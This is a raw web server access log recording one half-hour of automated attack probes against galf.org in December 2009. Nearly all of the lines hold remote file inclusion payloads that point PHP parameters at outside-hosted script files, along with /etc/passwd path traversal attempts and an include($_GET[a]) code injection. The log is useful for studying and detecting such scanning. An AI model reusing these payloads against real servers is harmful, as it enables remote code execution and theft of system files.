204.202.2.23 - - [27/Dec/2009:20:58:47 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [27/Dec/2009:20:58:47 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [27/Dec/2009:20:58:47 -0800] "GET /logs/access_090706.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:20:58:58 -0800] "GET /logs//_head.php?_zb_path=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:20:59:00 -0800] "GET /_head.php?_zb_path=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:20:59:00 -0800] "GET /logs/access_090608.log//_head.php?_zb_path=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:21:00:57 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:21:00:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:21:00:57 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.17.147.44 - - [27/Dec/2009:21:02:00 -0800] "GET /index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
201.17.147.44 - - [27/Dec/2009:21:02:07 -0800] "GET /index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:21:06:26 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:21:06:26 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:21:06:27 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:12 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:12 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:12 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:23 -0800] "GET /logs/access_090921.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:23 -0800] "GET /logs/access_091123.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:33 -0800] "GET /logs/access_090817.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:33 -0800] "GET /logs/access_091116.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:33 -0800] "GET /logs/access_090928.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:36 -0800] "GET /logs/access_091102.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:08:36 -0800] "GET /logs/access_091012.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:09:20 -0800] "GET /logs/access_091207.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:10:16 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:10:16 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:10:16 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:10:19 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:10:21 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:10:21 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:10:29 -0800] "GET /logs/access_091214.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:21:11:06 -0800] "GET /logs/access_091221.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:11:32 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:11:35 -0800] "GET /appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:11:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:11:35 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:12:08 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:12:16 -0800] "GET /logs/access_090928.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:12:17 -0800] "GET /logs/access_090928.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:22 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:22 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:22 -0800] "GET /logs/access_090810.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:34 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:34 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:34 -0800] "GET /logs/access_090706.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:37 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:12:39 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:40 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:40 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:40 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [27/Dec/2009:21:12:52 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://cimpli.mwzaf.com/upload/files/17/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:12:54 -0800] "GET /logs/access_091214.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [27/Dec/2009:21:13:15 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [27/Dec/2009:21:13:17 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:23 -0800] "GET /appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:23 -0800] "GET /logs//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:23 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:21:13:32 -0800] "GET /logs/access_090601.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:36 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:36 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:36 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:36 -0800] "GET /logs/access_090810.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:37 -0800] "GET /appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:13:37 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:14:23 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:14:50 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:14:50 -0800] "GET /logs/access_090706.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:14:50 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [27/Dec/2009:21:15:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:15:48 -0800] "GET /appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:15:48 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [27/Dec/2009:21:15:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [27/Dec/2009:21:16:03 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.beautytek.com.tw/kampret/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.11.58 - - [27/Dec/2009:21:16:03 -0800] "GET /logs/access_090928.log///appserv/main.php?appserv_root=http://www.beautytek.com.tw/kampret/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.11.58 - - [27/Dec/2009:21:16:03 -0800] "GET //appserv/main.php?appserv_root=http://www.beautytek.com.tw/kampret/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
208.80.193.54 - - [27/Dec/2009:21:18:32 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {64989CCC-F99D-4F37-AB4F-A1B89A39403C}; .NET CLR 1.1.4322)" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:19:48 -0800] "GET /logs/access_091221.log////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:19:48 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:19:48 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:21:52 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:21:52 -0800] "GET /logs/access_090713.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:21:52 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:22:03 -0800] "GET /logs/access_091026.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:22:40 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:22:41 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:22:43 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:04 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:04 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:23:30 -0800] "GET /logs/access_090713.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:23:30 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:23:30 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:23:38 -0800] "GET /logs/access_091026.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:53 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:56 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.203.208.203 - - [27/Dec/2009:21:23:56 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ferieispania.no/calendar/events/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
115.68.3.94 - - [27/Dec/2009:21:24:23 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:27:50 -0800] "GET /logs/access_091221.log////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:28:19 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:28:19 -0800] "GET /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:28:20 -0800] "GET /logs/access_090706.log//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:28:46 -0800] "GET /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:28:46 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:17 -0800] "GET /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:17 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:17 -0800] "GET /logs/access_090706.log//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [27/Dec/2009:21:29:40 -0800] "GET /logs/access_091221.log////?_SERVER[DOCUMENT_ROOT]=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:52 -0800] "GET /components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:52 -0800] "GET /logs/access.log%20%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:21:29:52 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [27/Dec/2009:21:30:04 -0800] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
